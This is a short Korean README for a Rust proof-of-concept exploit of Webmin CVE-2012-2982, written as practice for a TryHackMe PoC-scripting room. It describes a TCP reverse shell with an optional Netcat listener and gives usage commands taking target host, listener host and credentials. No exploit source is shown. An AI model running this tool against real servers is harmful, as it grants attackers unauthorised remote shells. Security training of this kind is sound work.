
Webmin의 CVE-2012-2982를 Rust PoC로 악용하여 구성 가능한 TCP 리버스 셸과 선택적 Netcat 리스너를 제공합니다.
이 PoC 익스플로잇(CVE-2012-2982)은 TryHackMe의 "Intro to PoC scripting" 룸을 위한 연습으로 작성되었습니다.
해당 룸은 여기에서 찾을 수 있습니다: https://tryhackme.com/room/intropocscripting
원래는 파이썬을 사용하여 따라가려고 했지만, 대신 Rust 실력을 연습하기로 결정했습니다.
또한 Github에 있는 거의 모든 비-Metasploit 구현체가 파이썬으로 되어 있다는 것을 보았고, 그래서 새로운 것을 가져오는 것이 재미있을 것이라고 생각했습니다.
참고: 기본적으로 프로그램은 Netcat 리스너를 생성합니다. Netcat이 경로에 없거나 자신의 리스너를 실행하려면 -d 플래그를 사용하여 프로그램을 실행하세요.
소스에서 (Rust 및 Cargo 필요):
# To get detailed info about arguments:
cargo run -- --help
# General command structure:
cargo run -- <rhost> <lhost> <username> <password> [options]
바이너리에서:
# To get detailed info about arguments:
./cve-2012-2982 --help
# General command structure:
./cve-2012-2982 <rhost> <lhost> <username> <password> [options]
프로그램 기본값: